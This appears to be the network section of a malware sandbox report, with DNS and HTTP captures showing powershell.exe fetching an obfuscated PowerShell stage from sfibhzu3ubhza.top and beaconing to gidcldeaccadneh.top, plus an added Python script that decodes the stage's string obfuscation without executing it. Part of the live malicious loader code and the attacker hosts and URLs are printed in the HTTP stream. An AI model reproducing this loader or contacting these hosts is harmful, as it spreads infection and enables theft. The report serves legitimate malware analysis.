Nov 15, 2024 18:23:52.010422945 CET | 49763 | 80 | 192.168.11.20 | 206.188.196.25
Nov 15, 2024 18:23:52.010459900 CET | 49765 | 80 | 192.168.11.20 | 74.125.136.106
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 15, 2024 18:23:47.125778913 CET | 53334 | 53 | 192.168.11.20 | 1.1.1.1
Nov 15, 2024 18:23:47.317055941 CET | 53 | 53334 | 1.1.1.1 | 192.168.11.20
Nov 15, 2024 18:23:50.224180937 CET | 56619 | 53 | 192.168.11.20 | 1.1.1.1
Nov 15, 2024 18:23:50.405613899 CET | 53 | 56619 | 1.1.1.1 | 192.168.11.20
Nov 15, 2024 18:23:51.157783031 CET | 54668 | 53 | 192.168.11.20 | 1.1.1.1
Nov 15, 2024 18:23:51.277218103 CET | 53 | 54668 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 15, 2024 18:23:47.125778913 CET | 192.168.11.20 | 1.1.1.1 | 0xae87 | Standard query (0) | sfibhzu3ubhza.top | A (IP address) | IN (0x0001) | false
Nov 15, 2024 18:23:50.224180937 CET | 192.168.11.20 | 1.1.1.1 | 0x8cb2 | Standard query (0) | gidcldeaccadneh.top | A (IP address) | IN (0x0001) | false
Nov 15, 2024 18:23:51.157783031 CET | 192.168.11.20 | 1.1.1.1 | 0xe3b0 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 15, 2024 18:23:47.317055941 CET | 1.1.1.1 | 192.168.11.20 | 0xae87 | No error (0) | sfibhzu3ubhza.top | | 206.188.196.25 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 18:23:50.405613899 CET | 1.1.1.1 | 192.168.11.20 | 0x8cb2 | No error (0) | gidcldeaccadneh.top | | 206.188.196.37 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 18:23:51.277218103 CET | 1.1.1.1 | 192.168.11.20 | 0xe3b0 | No error (0) | www.google.com | | 74.125.136.106 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 18:23:51.277218103 CET | 1.1.1.1 | 192.168.11.20 | 0xe3b0 | No error (0) | www.google.com | | 74.125.136.147 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 18:23:51.277218103 CET | 1.1.1.1 | 192.168.11.20 | 0xe3b0 | No error (0) | www.google.com | | 74.125.136.105 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 18:23:51.277218103 CET | 1.1.1.1 | 192.168.11.20 | 0xe3b0 | No error (0) | www.google.com | | 74.125.136.104 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 18:23:51.277218103 CET | 1.1.1.1 | 192.168.11.20 | 0xe3b0 | No error (0) | www.google.com | | 74.125.136.99 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 18:23:51.277218103 CET | 1.1.1.1 | 192.168.11.20 | 0xe3b0 | No error (0) | www.google.com | | 74.125.136.103 | A (IP address) | IN (0x0001) | false
                                                                                                  • sfibhzu3ubhza.top
                                                                                                  • gidcldeaccadneh.top
                                                                                                  • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49763 | 206.188.196.25 | 80 | 1796 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
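The PowerShell stage that this session fetches (the response body is recorded in the HTTP stream that follows) hides every string behind two layers: each character is an integer arithmetic expression inside an `@(...)` array that `ForEach-Object { [char]$_ }` turns into a character, and some of the strings produced that way are then consumed in 3-digit groups by `.Substring($($_ * 3), 3) - 37` to yield a second string. The Python below is an added example, not code from the report or from the malware. It evaluates the arithmetic with a whitelisted AST walker instead of `eval` or a PowerShell host, so a hostile expression cannot execute, and it applies both layers to fragments copied from the response body. Its only assumption is that the expressions use nothing but integer literals, parentheses, unary minus and `+ - * /`, which is all the visible fragments contain; anything else is rejected.

```python
"""Decode the two string-obfuscation layers in the PowerShell stage served
by sfibhzu3ubhza.top in this report (added example, not the malware's code).

Layer 1: @((expr),(expr),...) | ForEach-Object { [char]$_ }  -> one char per arithmetic result
Layer 2: digits.Substring($($_ * 3), 3) - 37                 -> one char per 3-digit group
"""
import ast
import operator
from fractions import Fraction

# Assumption: the generator only emits these operators. Anything else
# (names, calls, attribute access, strings) raises instead of running.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,   # exact on Fraction, so 62758636/6484 == 9679, not 9678.99
}


def eval_arith(expr: str) -> int:
    """Evaluate one obfuscated expression exactly; refuse any non-arithmetic syntax.

    PowerShell's '/' is floating division, but every division the stage
    emits comes out integral because [char] needs an integral value, so a
    non-integer result means the text was not one of these char codes.
    """
    tree = ast.parse(expr.strip(), mode="eval")

    def walk(node: ast.AST) -> Fraction:
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return Fraction(node.value)
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"disallowed syntax in obfuscated expression: {ast.dump(node)}")

    value = walk(tree)
    if value.denominator != 1:
        raise ValueError(f"non-integral char code {value} from {expr!r}")
    return int(value)


def split_top_level(body: str) -> list:
    """Split 'a,b,(c,d)'-style text at the commas that sit outside parentheses."""
    parts, depth, cur = [], 0, []
    for ch in body:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if cur:
        parts.append("".join(cur))
    return [p for p in (x.strip() for x in parts) if p]


def decode_char_array(ps_fragment: str) -> str:
    """Layer 1: locate the '@(' array literal in a PowerShell fragment and
    map every element's arithmetic result to a character, as [char]$_ does."""
    start = ps_fragment.index("@(") + 2
    depth, end = 1, start
    while depth:  # scan to the ')' that closes the @( ... ) array
        if ps_fragment[end] == "(":
            depth += 1
        elif ps_fragment[end] == ")":
            depth -= 1
        end += 1
    body = ps_fragment[start:end - 1]
    return "".join(chr(eval_arith(e)) for e in split_top_level(body))


def decode_triplets(digits: str, offset: int = 37) -> str:
    """Layer 2: each 3-digit group minus `offset` is a char code
    (the stage's Substring($($_ * 3), 3) - 37 loop)."""
    if len(digits) % 3 or not digits.isdigit():
        raise ValueError("expected a string made of 3-digit groups")
    return "".join(chr(int(digits[i:i + 3]) - offset) for i in range(0, len(digits), 3))


# Fragments copied verbatim from the response body in this report's HTTP stream.
METHOD_NAME = ("[CHaR[]]@((-3324+(-2958+(25574570/4018))),(160-43),(1176/(8452-8440)),"
               "(-7048+7163),(-4214+4330),(558600/4900),(662340/6308),(123420/1122),"
               "(-3710+3813)) -join ''")
FIRST_FIVE = ("@((4603-(44039450/(62758636/(7194-710)))),(160264/3082),"
              "(528-(8065-7594)),(-8002+8052),(3342-(4245512/1292)))")
TRIPLETS = "108138153107" + "142138145137"

if __name__ == "__main__":
    print(decode_char_array(METHOD_NAME))  # Substring  (method invoked on the joined strings)
    print(decode_char_array(FIRST_FIVE))   # 54928      (the first big array yields digits)
    print(decode_triplets(TRIPLETS))       # GetField   (a .NET reflection method name)
```

Run on the fragments above, the method-name array resolves to `Substring`, the first five elements of the large array resolve to the digits `54928`, and the quoted digit string resolves to `GetField`: the first layer produces digit strings and the `Substring`/`-37` loop turns them into .NET member names the stage resolves by reflection. Running `eval_arith` on the full response body is the way to recover the rest of the stage without ever executing it; feed it each `@(...)` array in turn, and treat any `ValueError` as a sign the fragment was not a pure char-code array.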
Timestamp | Bytes transferred | Direction | Data
Nov 15, 2024 18:23:47.539793968 CET | 177 | OUT | GET /1.php?s=mints21 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                  Host: sfibhzu3ubhza.top
                                                                                                  Connection: Keep-Alive
Nov 15, 2024 18:23:48.092417955 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Fri, 15 Nov 2024 17:23:47 GMT
                                                                                                  Content-Type: text/plain
                                                                                                  Content-Length: 20113
                                                                                                  Connection: keep-alive
                                                                                                  Data Raw: 24 68 6f 70 66 72 65 64 3d 24 65 78 65 63 75 74 69 6f 6e 63 6f 6e 74 65 78 74 3b 24 6f 72 65 6e 65 6e 69 6e 61 6e 61 74 65 73 61 6e 61 6e 6f 6e 61 74 61 6c 65 6e 65 72 6f 6e 72 65 65 64 61 72 62 65 20 3d 20 28 2d 4a 6f 49 4e 20 28 40 28 28 34 36 30 33 2d 28 34 34 30 33 39 34 35 30 2f 28 36 32 37 35 38 36 33 36 2f 28 37 31 39 34 2d 37 31 30 29 29 29 29 2c 28 31 36 30 32 36 34 2f 33 30 38 32 29 2c 28 35 32 38 2d 28 38 30 36 35 2d 37 35 39 34 29 29 2c 28 2d 38 30 30 32 2b 38 30 35 32 29 2c 28 33 33 34 32 2d 28 34 32 34 35 35 31 32 2f 31 32 39 32 29 29 2c 28 31 30 34 37 30 36 2f 28 2d 32 32 35 33 2b 28 2d 31 38 37 33 2b 36 30 36 35 29 29 29 2c 28 31 37 35 39 35 32 2f 28 31 32 38 34 34 2d 28 38 35 31 34 2b 28 39 34 38 34 2d 38 32 39 36 29 29 29 29 2c 28 2d 32 31 30 38 2b 28 31 31 39 36 34 2d 39 38 30 31 29 29 2c 28 2d 37 37 34 36 2b 37 38 30 31 29 2c 28 31 31 32 31 35 30 2f 32 32 34 33 29 2c 28 31 38 37 32 36 34 2f 33 33 34 34 29 2c 28 34 36 35 33 2d 34 36 30 35 29 2c 28 2d 39 34 34 32 2b 39 34 39 31 29 [TRUNCATED]
                                                                                                  Data Ascii: $hopfred=$executioncontext;$oreneninanatesananonataleneronreedarbe = (-JoIN (@((4603-(44039450/(62758636/(7194-710)))),(160264/3082),(528-(8065-7594)),(-8002+8052),(3342-(4245512/1292)),(104706/(-2253+(-1873+6065))),(175952/(12844-(8514+(9484-8296)))),(-2108+(11964-9801)),(-7746+7801),(112150/2243),(187264/3344),(4653-4605),(-9442+9491),(337920/(-600+6744)),(4097-4045),(3998-(10619-(11538-4861))),(-7981+(3942+(9965-5872))),(-3461+3517),(315-(-9357+9616)),(-4122+(12759089/(8312-(9793-4540)))),(114-60),(6184-6128),(-9342+(2979+6418)),(-10020+(10711-639)),(3669-(34907626/9659)),(832-782),(-5974+(13706-7676)),(-4736+(6094-1310)),(999-(-1005+1949)),(-2213+(5652-(26993385/7965))),(9996-(20123-(25304755/2485))),(6321/(-247+(-4488+4864))),(-3229+3285),(133265/2423),(-9289+(21066528/2256)),(-6823+(9312-(15760150/6475))),(216801/(8170-3919)),(4714-(-1951+6611)),(-5346+5402),(5999-5943),(1651-1595),(324060/(11318532/1921)),(125440/(11348-(91799532/10079))),(-8290+(14884-(-626+7170))),(199864/(7728-4159)),(13 [TRUNCATED]
Nov 15, 2024 18:23:48.092439890 CET | 1289 | IN | Data Raw: 28 38 39 34 34 2d 38 38 38 38 29 2c 28 31 32 38 38 35 30 2f 32 35 37 37 29 2c 28 31 33 34 32 38 38 2f 32 33 39 38 29 29 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 20 5b 63 68 61 72 5d 24 5f 20 7d 29 29 3b 24 65 6e 61 72 65 6e 65 72 61
                                                                                                  Data Ascii: (8944-8888),(128850/2577),(134288/2398))| ForEach-Object { [char]$_ }));$enareneranatestionororonesoroninereris = (-JOiN (@((8362-(76379844/(13050-(12765-8903)))),(291256/(12666-(9430-(10946-(2175+6063))))),(-8278+8333),(468027/9177),(8959-(81
                                                                                                  Nov 15, 2024 18:23:48.092454910 CET1289INData Raw: 65 6e 69 6e 61 6e 61 74 65 73 61 6e 61 6e 6f 6e 61 74 61 6c 65 6e 65 72 6f 6e 72 65 65 64 61 72 62 65 20 2b 20 24 65 6e 61 72 65 6e 65 72 61 6e 61 74 65 73 74 69 6f 6e 6f 72 6f 72 6f 6e 65 73 6f 72 6f 6e 69 6e 65 72 65 72 69 73 29 2e 28 28 5b 43
                                                                                                  Data Ascii: eninanatesananonataleneronreedarbe + $enareneranatestionororonesoroninereris).(([CHaR[]]@((-3324+(-2958+(25574570/4018))),(160-43),(1176/(8452-8440)),(-7048+7163),(-4214+4330),(558600/4900),(662340/6308),(123420/1122),(-3710+3813)) -join ''))(
                                                                                                  Nov 15, 2024 18:23:48.092600107 CET1289INData Raw: 30 38 31 33 38 31 35 33 31 30 37 27 20 2b 20 27 31 34 32 31 33 38 31 34 35 31 33 37 27 29 2e 53 75 62 73 74 72 69 6e 67 28 24 28 24 5f 20 2a 20 33 29 2c 20 33 29 20 2d 20 33 37 29 7d 29 29 28 24 74 69 6f 6e 65 72 65 72 65 6e 6f 72 61 74 69 73 69
                                                                                                  Data Ascii: 08138153107' + '142138145137').Substring($($_ * 3), 3) - 37)}))($tionererenoratisinesinenalesererer, ([chAR[]]@((4356-(3362+916)),(216006/(7230-(9947-4663))),(63360/576),(660560/(186+8071)),(1181934/(1873+8229)),(-5107+(45096120/8664)),(644220
                                                                                                  Nov 15, 2024 18:23:48.092628002 CET1289INData Raw: 39 33 34 39 36 34 2f 33 34 34 36 29 29 2c 28 31 38 34 37 33 34 2f 28 37 30 39 34 2d 28 36 32 36 38 2d 32 35 39 35 29 29 29 2c 28 31 38 34 30 38 30 2f 33 35 34 30 29 2c 28 34 34 38 30 33 34 2f 28 2d 31 32 30 2b 35 35 31 38 29 29 2c 28 2d 39 39 33
                                                                                                  Data Ascii: 934964/3446)),(184734/(7094-(6268-2595))),(184080/3540),(448034/(-120+5518)),(-993+1109),(7218-(15907-(-196+8999))),(864045/(7238+(8813-(15016-7194)))),(-7102+7212),(7262-(2439+(2260880/479))))| ForEach-Object { [char]$_ }))).(([char[]]@((-295
                                                                                                  Nov 15, 2024 18:23:48.092643023 CET1289INData Raw: 20 20 20 20 20 20 20 20 20 24 68 63 69 62 73 6d 6e 67 71 35 36 6a 72 6b 65 2b 2b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 24 68 63 69 62 73 6d 6e 67 71 35 36 6a 72 6b 65 20 2d 67 65 20 24 34 37 78 76 79 32 6e 68 33 73 62 38 72 6a 30
                                                                                                  Data Ascii: $hcibsmngq56jrke++ if ($hcibsmngq56jrke -ge $47xvy2nh3sb8rj0.((-join (@((600932/(14990-7083)),(3695-3594),(-439+(9027-(1600+(10355-3477)))),(-5875+(1032+(21792076/4406))),(7852-7736),(5156-5052))| ForEach-Object { [char]$
                                                                                                  Nov 15, 2024 18:23:48.092963934 CET1289INData Raw: 30 34 2d 38 35 31 29 29 29 29 29 2c 28 2d 36 35 34 38 2b 36 36 36 33 29 2c 28 34 35 36 38 30 38 2f 33 39 33 38 29 2c 28 36 36 39 36 33 30 2f 36 36 33 30 29 2c 28 31 31 31 31 32 35 35 2f 28 31 34 34 35 34 2d 34 32 35 39 29 29 2c 28 36 31 33 39 2d
                                                                                                  Data Ascii: 04-851))))),(-6548+6663),(456808/3938),(669630/6630),(1111255/(14454-4259)),(6139-(8428-(9856035/4221))),(57816/792),(744180/(11093-(15003464/(5754+3214)))),(-5916+(41263002/6921)),(-5974+6051),(-4784+4885),(2232-(7869961/3707)),(886779/(1+(10
                                                                                                  Nov 15, 2024 18:23:48.093003035 CET1289INData Raw: 29 29 29 29 29 29 28 20 24 71 6b 33 74 34 76 63 78 77 66 64 39 67 62 36 20 29 0d 0a 20 20 20 20 20 20 20 20 24 62 31 67 73 6d 39 6e 74 63 6b 34 68 35 30 37 2e 28 28 2d 6a 6f 69 6e 20 28 40 28 28 2d 34 36 37 39 2b 28 32 30 31 37 30 35 30 2f 34 32
                                                                                                  Data Ascii: ))))))( $qk3t4vcxwfd9gb6 ) $b1gsm9ntck4h507.((-join (@((-4679+(2017050/425)),(-43+151),(-3835+(9923-5977)),(7690-7575),(-4684+4785))| ForEach-Object { [char]$_ })))()$smhw5bovtk7cz9j.(([system.String]::new(@((-4801+4868),(10033-99
                                                                                                  Nov 15, 2024 18:23:48.093018055 CET1289INData Raw: 67 2f 39 72 31 75 54 4a 6a 75 56 4a 78 70 7a 67 2b 49 37 49 61 7a 4c 72 49 34 71 66 67 37 4f 43 53 35 49 64 43 6b 43 57 71 51 35 68 4c 2b 4b 76 73 76 37 38 52 55 53 38 35 4f 4a 67 38 69 6b 6f 5a 52 4c 35 6c 34 51 77 70 61 54 34 45 54 51 36 39 35
                                                                                                  Data Ascii: g/9r1uTJjuVJxpzg+I7IazLrI4qfg7OCS5IdCkCWqQ5hL+Kvsv78RUS85OJg8ikoZRL5l4QwpaT4ETQ695DRY3QCpSa1cHsx47phxji3dfIy9qdnoXxh90wK/brTsi6My6p5dz4+Qs49Fi4rZSAyq8G74Lui4KS53h+IQEn+Vdx1iEMi7D4Y58891ZYaaDiIkeJdU9VmIElR+KgyRHiA31Q5gEkGFg4peppAKeyyZPe4rlKF7+B
                                                                                                  Nov 15, 2024 18:23:48.093030930 CET706INData Raw: 35 68 7a 35 56 36 39 4c 56 58 62 62 4c 49 65 36 79 79 64 76 4c 54 41 6f 48 52 59 62 50 6c 4f 34 4a 4b 45 33 32 79 6e 6d 7a 61 38 37 39 6d 43 43 32 76 36 6b 36 49 47 33 45 37 68 6f 4f 5a 57 71 31 61 6d 66 59 56 77 41 2f 30 2b 49 34 4a 48 30 53 72
                                                                                                  Data Ascii: 5hz5V69LVXbbLIe6yydvLTAoHRYbPlO4JKE32ynmza879mCC2v6k6IG3E7hoOZWq1amfYVwA/0+I4JH0SrNniW/XIRuVbAgihKDbPnQXCm94Yk/rb84HMOFmyNf5r31Que2HYvZG9cNqVnvHa24KUtL/Y4OyIaVj2olNfViDM+Hw9ui4qP1xNGfD7dPtnoIghRzTHXR14zSt2Y5Y30SGt1hjF/yguc/D0Jgmd3J/gWX/Idd20zs
                                                                                                  Nov 15, 2024 18:23:48.304362059 CET1289INData Raw: 4b 76 38 31 49 64 44 35 39 4e 4e 4a 76 48 36 51 6e 50 70 4e 69 4e 48 4e 48 74 31 6d 52 39 45 77 50 62 68 6b 6a 63 4e 71 71 52 54 2f 64 34 75 4d 70 32 67 64 62 72 63 53 39 4b 74 66 39 57 30 37 74 62 78 54 31 55 64 44 61 57 72 67 71 62 47 51 38 52
                                                                                                  Data Ascii: Kv81IdD59NNJvH6QnPpNiNHNHt1mR9EwPbhkjcNqqRT/d4uMp2gdbrcS9Ktf9W07tbxT1UdDaWrgqbGQ8R3O7UHadEiQHTDc8Rk1ZzbTPvEKNHPy7rbHElF+xeb4MrJC4bV41HKm8fFTVNGlpW0rYN4hBGtc1RII8Rzm+iF+8sAMMBkGXXpnqHdJVmYfq6B6TCl5OygQBA7RakhXz9e+sed0sgNOvP/FHR0JtjTMkYMm6QkRQJ5


Session ID: 1
Source IP: 192.168.11.20
Source Port: 49764
Destination IP: 206.188.196.37
Destination Port: 80
PID: 1796
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Nov 15, 2024 18:23:50.621809959 CET | 219 | OUT | GET /uyo2kijx89htr.php?id=computer&key=58597074642&s=mints21 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
Host: gidcldeaccadneh.top
Connection: Keep-Alive
Nov 15, 2024 18:23:51.155949116 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 15 Nov 2024 17:23:51 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID: 2
Source IP: 192.168.11.20
Source Port: 49765
Destination IP: 74.125.136.106
Destination Port: 80
PID: 1796
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Nov 15, 2024 18:23:51.396631002 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
Host: www.google.com
Connection: Keep-Alive
Nov 15, 2024 18:23:51.569926023 CET | 1289 | IN | HTTP/1.1 200 OK
Date: Fri, 15 Nov 2024 17:23:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ZnYo3RKo-yHVJpE28nHw-w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-XmTuBCp5Ka_CSau_0ePpYpCtT4Om9nOzJTCjotXuW5yZwRieAXsA; expires=Wed, 14-May-2025 17:23:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=519=hLPCwOLMGdQyv6F61uzCX2JVzUgoMiqyeJBmnuSgfGhPhH60Iv4rrWEKLtiGUMuYV16Jm7kqXQ4xQL66AHVy1hz6ztnGyAc0cwAS4rLmaj9sOobzcEQDzFLl8Qwu6u6M-H77wtMtlCCKhHj8nPBl_puGgHe7d3FUbrZYKZSZk1P9tOr3V3jB90rVZUIRUwXzBDeQ6eRuaA; expires=Sat, 17-May-2025 17:23:51 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
Data Raw: 35 36 64 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f
Data Ascii: 56d0<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to
Nov 15, 2024 18:23:51.569962978 CET | 1289 | IN | Data Raw: 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d
Data Ascii: help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/logos/doodles/2024/celebrating-the-kayak-6753651837110
Nov 15, 2024 18:23:51.569989920 CET | 1289 | IN | Data Raw: 34 2c 36 2c 33 36 2c 31 2c 36 2c 31 2c 36 2c 31 2c 32 34 2c 32 37 2c 31 2c 35 2c 34 2c 31 2c 36 2c 31 2c 36 2c 31 2c 36 2c 31 2c 38 2c 31 2c 36 2c 35 2c 32 2c 31 2c 34 35 2c 31 30 2c 31 2c 33 2c 31 2c 31 2c 31 2c 38 2c 32 37 39 37 39 30 32 33 2c
Data Ascii: 4,6,36,1,6,1,6,1,24,27,1,5,4,1,6,1,6,1,6,1,8,1,6,5,2,1,45,10,1,3,1,1,1,8,27979023,16673,2169858,23029351,8163,4636,16436,84045,22623,884,14280,8182,5933,8939,34557,19011,2655,3439,3319,23878,9140,4599,328,4456,1769,1116,22291,6,10210,688,18357
Nov 15, 2024 18:23:51.570015907 CET | 1289 | IN | Data Raw: 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3b 28 28 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f 30 3a 61 2e 73 74 76 73 63 29 3f 67 6f 6f 67 6c 65 2e 6b 45 49 3d 5f 67 2e 6b 45 49 3a 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d
Data Ascii: ction(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var h=this||self;function l(){return window.google!==void 0&&window.google.
Nov 15, 2024 18:23:51.570044041 CET | 1289 | IN | Data Raw: 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b 67 5d 7d 3b 61 2e 73 72 63 3d 63 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62
Data Ascii: a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x||(d.x=function(a,b){if(a)var c=a.id;else{do c=Math.random
Nov 15, 2024 18:23:51.570069075 CET | 1289 | IN | Data Raw: 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61
Data Ascii: px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:
Nov 15, 2024 18:23:51.570094109 CET | 1289 | IN | Data Raw: 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b
Data Ascii: ;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXI
Nov 15, 2024 18:23:51.570138931 CET | 1289 | IN | Data Raw: 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 67 62 74 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 7a 74 20 2e 67 62 74 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 6f 20
Data Ascii: lative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .
Nov 15, 2024 18:23:51.570440054 CET | 1289 | IN | Data Raw: 62 74 6f 20 23 67 62 69 34 69 2c 2e 67 62 74 6f 20 23 67 62 69 34 69 64 7b 74 6f 70 3a 33 70 78 7d 2e 67 62 69 34 70 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 32 34 70 78 7d 23 67 62 69 34 69 64 7b 62 61 63 6b 67 72 6f 75 6e
Data Ascii: bto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;width:48px}#gbmpiw{display:inline-block;line-
Nov 15, 2024 18:23:51.570444107 CET | 1289 | IN | Data Raw: 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 67 62 6d 6c 62 2d 68 76 72 2c 2e 67 62 6d 6c 62 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f
Data Ascii: e:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{background:#eee;cursor:pointer;outline:0 so
